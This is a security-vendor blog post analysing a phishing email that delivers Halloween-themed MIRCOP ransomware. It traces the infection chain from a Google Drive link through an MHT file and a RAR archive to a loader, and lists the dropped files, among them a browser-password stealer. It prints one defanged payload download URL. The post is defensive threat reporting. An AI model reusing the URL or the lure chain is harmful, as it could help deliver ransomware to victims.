Spooky Ransomware Steals Past SEGs in Under 15 Minutes

By Harsh Patel and Zachary Bailey, Cofense Phishing Defense Center

Dealing with a ransomware attack on any businesses, organizations – or individuals – can turn into a nightmare scenario quickly. Ransomware typically has a two-pronged attack style. It not only denies the target access to their own computer, but it also attacks targets monetarily by demanding some form of payment to relinquish control.

This type of malware attack can be carried out through various methods with one of the most popular being through phishing emails. Over the past year with the rise in ransomware attacks, Cofense has observed threat actors delivering reconnaissance and data exfiltrating tools ahead of the final ransom attack. In early November, the Cofense Phishing Defense Center (PDC) intercepted and analyzed such an email that made its way into the inbox of targets using a secure email gateway (SEG), and it delivered a Halloween-themed MIRCOP ransomware.

Figure 1: Email Body

Figure 1 shows that the email contains a lot of suspicious indicators such as a generic “from” domain and a subject saying “undisclosed-recipients.” In the email body itself, the threat actor is trying to suggest communication was lost for a previous arrangement and wanted support for a “DWG following Supplies List” that is hyperlinked to a Google Drive URL. Once clicked, the infection URL downloads an MHT file.

Figure 2: MHT File

MHT file extensions are commonly used by web browsers as a webpage archive. Figure 2 shows that after opening the file the target is presented with a blurred out and apparently stamped form, but the threat actor is using the MHT file to reach out to the malware payload (hXXps://a[.]pomf[.]cat/gectpe.rar).

 Figure 3: RAR File

 Figure 4: EXE File

As shown in Figure 3, the downloaded RAR file contains an EXE file. The executable is a DotNETLoader that uses VBS scripts to drop and run the MIRCOP ransomware in memory.

Figure 5: MIRCOP Ransomware Activated

After a few minutes, the ransomware starts the process of taking a screenshot, locking files, changing the background and running a program to find stored passwords in web browsers. MIRCOP ransomware is fully activated when the screen flashes, and the home screen is changed into the ransom note featured in Figure 5. The image dropped is extremely gory and will most likely deliver a shock to the user when coupled with the ransom message. The use of Skype as a medium to negotiate is uncommon, as most organized ransomware gangs have dedicated sites or mobile chat apps.

The MIRCOP ransomware, also known as Crypt888 ransomware, encrypts users’ files to hold them hostage. After the payment demand is met, the threat actor promises to provide the decryption method. For this attack, the threat actor gives a set of instructions on the wallpaper. The user is also unable to open any applications besides a few web browsers that can give them access to their email address which is used to contact the attacker. The email address is then used to set up the payment required to gain access to the decrypting tool the threat actor claims will unlock the files and applications.

Figure 6: Files Saved in Temp Folder

The file named Pl2.exe was originally named “Web Browser Pass View,” which is a tool known for retrieving passwords from the vaults of common web browsers. The executable’s icon shows Internet Explorer, Google Chrome, Firefox, and Opera, referencing its targets. Looking up the SHA256 hash of this executable on Virus Total, it can be linked to dozens of malicious executables going back to June of this year.

The files stored in the Temp folder associated with the malware:

• Gbr.jpg – The screenshot that was taken after running the malware
• 888.vbs – VBS scripts to automatically detonate the ransomware
• MILKXC_LUCK COMPUTER.exe & x.exe – used to lock the files
• Pl2.exe – The password utility known as “Web Browser Pass View”
• PI2.txt – Where the passwords get stored
• UYNHIJ.vbs – The VBS script that’s run by the DotNETLoader
• Wl.jpg – Original image that replaces the current background

The MIRCOP ransomware poses a threat to medium-sized organizations as it can lock the files on critical computer systems. Its opening lure is business-themed, making use of a service – such as Google Drive – that enterprises employ for delivering files. The rapid deployment from the MHT payload to final encryption shows that this group is not concerned with being sneaky. Since the delivery of this ransomware is so simple, it is especially worrying that this email found its way into the inbox of an environment using a SEG.

In this case, a well-conditioned user quickly reported this email. They used Cofense Reporter, allowing the PDC to quickly identify the threat, allowing the organization to mitigate a potential incident. With Cofense Managed Phishing Detection and Response, provided by the PDC, enterprises can have our complete view of threats. Contact us to learn more.

Indicators of Compromise:

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.